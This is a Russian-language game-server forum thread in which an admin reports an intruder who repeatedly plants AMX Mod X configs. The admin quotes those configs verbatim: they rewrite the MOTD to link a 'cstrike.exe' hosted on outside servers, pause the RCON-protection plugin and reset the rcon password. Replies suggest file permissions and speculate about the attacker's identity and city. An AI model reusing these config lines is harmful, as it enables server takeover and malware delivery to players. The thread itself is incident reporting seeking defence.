Некто заливает конфиги, меняет ркон, меняет motd., Обсуждалось не раз, но все решения не помогли. |
Здравствуйте, гость Вход | Регистрация
Наши новости:
|
|
|
Некто заливает конфиги, меняет ркон, меняет motd., Обсуждалось не раз, но все решения не помогли. |
A1on3
|
27.6.2013, 10:18
Сообщение
|
![]() ![]() |
Доброго времени суток, уважаемые.
Итак. Буквально вчера днём, пока был на работе, мне написали, что на месте моего мотд размещена картинка с голой бабой. Я с телефона только смог переименовать motd.txt, чтобы его вообще отключить. Вечером веселье продолжилось. Я меняю мотд на свой, через некоторое время, он опять меняется. Причём содержание не одно и то же всегда, а несколько вариантов. motd.txt http://zeal1209.no-ip.org/cstrike.exe motd.txt http://31.200.239.201/cstrike.exe motd.txt <html><meta http-equiv="content-type" content="text/html; charset=windows-1251"><center><h1>PwNeD by AzazeL.</h1><h2>Chernomorets - Odessa RULEZZ</h2><img src="http://25.media.tumblr.com/9342795897ff09b4d4a8dd1dc74ae92f/tumblr_mm8657yoWl1rg83rpo1_1280.jpg"><br>botnet romana suge pula</center>#2846</html> Почитал форум и предпринял действия, как сказано тут. А именно: 1. Цитата Уязвимость "появляются конфиги :D" Решение: Патченная библиотека от Crock-а, архив upfile в аттаче - надо переименовать и заменить вашу. Скачанный файл имеет название engine_i686_p2.so, а мой - engine_amxx_i386.so. Как и было сказано, переименовал скачанный и заменил им свой. 2. Цитата Если вас уже поимели, то не забудьте удалить лишние конфиги addons/metamod/exec.cfg amxmodx/configs/maps/*.cfg В addons/metamod левых конфигов не было, а вот в amxmodx/configs/maps было 3 штуки с нехорошим содержанием: файл main.cfg motdfile motd.txt motd_write http://zeal1209.no-ip.org/cstrike.exe amxx pause rcon_defencer.amxx rcon_password zhenya файл prefix_awp.cfg motdfile motd.txt motd_write http://zeal1209.no-ip.org/cstrike.exe amxx pause rcon_defencer.amxx rcon_password zhenya файл prefix_de.cfg motdfile motd.txt motd_write http://zeal1209.no-ip.org/cstrike.exe amxx pause rcon_defencer.amxx rcon_password zhenya 3. Цитата Программа для подбора rcon пароля сервера: Решение: Установить сложный и длинный rcon пароль или убрать его вообще. Так же можно использовать этот плагин для шифрования ркон пароля. Вообще убрал ркон в server.cfg Скачал исходник версии 1.2, квар rcon_defencer_type выставил на значение 1 (используется rcon_defencer.ini в качестве белого списка, а именно только указанные в файле IP адреса имеют доступ к RCON.) и вписал свой IP. Зашифровал rcon в MD5 и вставил в сорец. Поставил модуль Orpheu и два дополнительных файла в addons/amxmodx/configs/orpheu/functions не забыл кинуть. Результат. Сделал рестарт, ркон-доступ в HLSW вернулся. Забыл посмотреть amx_plugins и amx_modules. Пошёл спать. Утром не работал Admin_ESP. Вот что сказали лог-файл, amx_plugins и amx_modules: log Error: L 06/27/2013 - 09:57:21: [AMXX] Couldn't find "AMX_Query" or "AMXX_Query" (file "cstrike/addons/amxmodx/modules/engine_amxx_i386.so") L 06/27/2013 - 09:57:21: [AMXX] Plugin "admin_spec_esp.amxx" failed to load: Module/Library "engine" required for plugin. Check modules.ini. amx_plugins unknown unknown unknown admin_spec_esp. bad load AutoRestart 1.0 Crash94 autorestart.amx stopped amx_modules MySQL 1.8.1.3746 AMX Mod X Dev Team running FakeMeta 1.8.1.3746 AMX Mod X Dev Team running CStrike 1.8.1.3746 AMX Mod X Dev Team running CSX 1.8.1.3746 AMX Mod X Dev Team running Fun 1.8.1.3746 AMX Mod X Dev Team running unknown unknown unknown bad load (Engine) nVault 1.8.1.3746 AMX Mod X Dev Team running Ham Sandwich 1.8.1.3746 AMX Mod X Dev Team running Orpheu 2.3 joaquimandrade running GeoIP 1.8.1.3746 AMX Mod X Dev Team running Вернул назад файл engine_amxx_i386.so, отключив патченный. RCON Defencer встал на паузу, появились конфиги в amxmodx/congigs/maps и опять motd.txt был изменён. prefix_de.cfg motdfile motd.txt motd_write http://31.200.239.201/cstrike.exe amxx pause rcon_defencer.amxx rcon_password zhenya prefix_cs.cfg motdfile motd.txt motd_write http://31.200.239.201/cstrike.exe amxx pause rcon_defencer.amxx rcon_password zhenya main.cfg motdfile motd.txt motd_write http://31.200.239.201/cstrike.exe amxx pause rcon_defencer.amxx rcon_password zhenya amx_plugins AMXBans: Core Gm 1.6 Larte Team amxbans_core.am running AMXBans: Main Gm 1.6 Larte Team amxbans_main.am debug Admin Commands 1.8.1.3746 AMXX Dev Team admincmd.amxx running Menus Front-End 1.8.1.3746 AMXX Dev Team menufront.amxx running Commands Menu 1.8.1.3746 AMXX Dev Team cmdmenu.amxx running Players Menu 1.8.1.3746 AMXX Dev Team plmenu.amxx running Maps Menu 1.8.1.3746 AMXX Dev Team mapsmenu.amxx running Admin Chat 1.8.1.3746 AMXX Dev Team adminchat.amxx running Anti Flood 1.8.1.3746 AMXX Dev Team antiflood.amxx running Admin Votes 1.8.1.3746 AMXX Dev Team adminvote.amxx running Pause Plugins 1.8.1.3746 AMXX Dev Team pausecfg.amxx running Stats Configurati 1.8.1.3746 AMXX Dev Team statscfg.amxx running Restrict Weapons 1.8.1.3746 AMXX Dev Team restmenu.amxx running CS Misc. Stats 1.8.1.3746 AMXX Dev Team miscstats.amxx running Fix AutoBuy Bug 1.1 PomanoB & UFPS.T autobuybugfix.a running Anti Fullupdate S 2.0 Pike anti_fullupdate running WeaponMenu Only A 1.0 UNREAL weaponmenu_only running Rock the Ban 1.0 Sho0ter rock_the_ban.am running Autoresponder/Adv 0.5 MaximusBrood ad_manager.amxx running Better High Ping 2.6 Lev bhpk.amxx running unknown unknown unknown admin_spec_esp. bad load Reset Score 1.0 Silenttt resetscore.amxx running Admin Check 1.51 OneEyed admin_check.amx running StatsX (MastaMan 1.8.1.3746 AMXX Dev Team statsx_shell.am running UFPS Map Manager 3.0.3(z) UFPS.Team umm.amxx running UFPS MOTD Notific 1.0 UFPS.Team umm_notificatio running UFPS Anti Blocker 2.0 UFPS.Team umm_antiblocker running Demo Recorder 1.6 Sho0ter demorecorder.am running Admin Free Look 2.0 Jim admin_freelook. running Instant AutoTeamB 1.2.0 ConnorMcLeod instant_autotea running UFPS Away From Ke 2.9 UFPS.Team ufps_afk.amxx running AutoRestart 1.0 Crash94 autorestart.amx stopped ST NOST VC 0.0 Quit voice_fix.amxx running c4 timer 1.1 cheap_suit c4timer.amxx running VIP 1.0 ill vip.amxx running AMXBans: Screens Gm 1.6 Larte Team amxbans_ssban.a running RCON Defencer 1.2 DJ_WEST rcon_defencer.a paused Colored Translit 3.0 Sho0ter colored_transli running Хотелось бы всё-таки избавиться от этого вредителя с вашей помощью. Спасибо за внимание.
Отредактировал: A1on3, - 27.6.2013, 10:26
|
|
|
|
Vitaliy
|
27.6.2013, 10:28
Сообщение
|
![]() |
Выставите просто права на файлы, должно помочь
или мне в скайп стучи |
|
|
|
Cracky
|
27.6.2013, 10:35
Сообщение
|
![]() |
chmod, если линуховый сервер.
|
|
|
|
ops244
|
27.6.2013, 11:21
Сообщение
|
|
|
я поставил "только чтение" и пох...
|
|
|
|
SiziF
|
27.6.2013, 11:58
Сообщение
|
![]() |
ТУплю..
в аттаче - надо переименовать и заменить вашу. чо де переименовать? |
|
|
|
SiziF
|
27.6.2013, 12:33
Сообщение
|
![]() |
ну у мну на последнем билде.не стим,все гуд.Ничо такого нима
|
|
|
|
A1on3
|
27.6.2013, 15:32
Сообщение
|
![]() ![]() |
|
|
|
|
farag1
|
27.6.2013, 17:09
Сообщение
|
|
|
Ха, ZeaL опять развлекается! :) Собственно, jenya - это его имя.
|
|
|
|
Kristl
|
27.6.2013, 17:22
Сообщение
|
![]() |
|
Поблагодарили 1 раз
|
|
farag1
|
27.6.2013, 17:52
Сообщение
|
|
|
Ну, так можно подумать, что от балды написано. Кстати, убить вы его не сможете - в Уссурийске проживает. :)
|
|
|
|
Kristl
|
27.6.2013, 17:54
Сообщение
|
![]() |
|
|
|
|
cs-portal
|
27.6.2013, 17:55
Сообщение
|
|
|
он мне говорил во владивостоке
|
|
|
|
![]() ![]() |